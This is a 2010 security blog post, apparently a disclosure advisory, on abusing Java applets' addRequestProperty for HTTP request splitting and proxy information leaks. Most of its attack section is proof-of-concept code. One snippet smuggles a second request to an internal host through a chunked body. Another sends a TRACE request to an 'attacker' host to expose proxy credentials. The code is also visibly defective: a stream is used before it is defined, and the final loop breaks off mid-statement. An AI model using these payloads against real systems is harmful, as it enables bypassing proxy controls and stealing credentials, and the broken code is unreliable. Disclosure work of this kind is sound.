Tuesday, October 12, 2010

Http Request Splitting and Header Abuse with Java AddRequestProperty

Summary
It is possible abuse the method AddRequestProperty to:
  • inject new requests by abusing the request header Transfer-Encoding. The result is a well known attack called Http Request Splitting [1][2][3].
  • gather information about the existence of a Http Proxy.

Analysis
Applets sandbox allow requests to be performed to the host where they originate by using the class java.net.URL. This is allowed according to Java SOP.
Example:

f=new Packages.java.net.URL("http://appletoriginatinghost/")
g=f.openConnection();
g.setDoOutput(true);
g.setRequestMethod("GET") ;
dis2.flush();
dis2.close();
g.connect();
dis = new Packages.java.io.DataInputStream(g.getInputStream());

while((rl=dis.readLine())!=null){
log(rl) ;
}


We found that is possible to force a split of a Http request by using
Request.addRequestProperty("Transfer-Encoding", "chunked");

This could be used by a malicious user to bypass access in case a
forward proxy is set.

In fact by setting the request header to Transfer-Encoding: chunked
the payload will be parsed according to rfc2616 :

f=new Packages.java.net.URL("http://appletoriginatinghost/")
g=f.openConnection();
g.setDoOutput(true);
g.setRequestMethod("GET") ;
g.addRequestProperty("Transfer-Encoding", "chunked");
dis2 = new Packages.java.io.DataOutputStream(g.getOutputStream());
dis2.writeBytes("0\n\nGET http://someinternalHost HTTP/1.1\nHost: 10.1.1.1
\n\n");
dis2.flush();
dis2.close();
g.connect();
dis = new Packages.java.io.DataInputStream(g.getInputStream());

while((rl=dis.readLine())!=null){
log(rl) ;
}



Also it can be abused to get forward proxy information such as proxy password.

f=new Packages.java.net.URL("http://attacker/")
g=f.openConnection();
g.setRequestMethod("TRACE") ;
g.addRequestProperty("Max-Forwards", "0");

g.connect();
dis = new Packages.java.io.DataInputStream(g.getInputStream());

i=0
while(i<350){>

No comments:

Post a Comment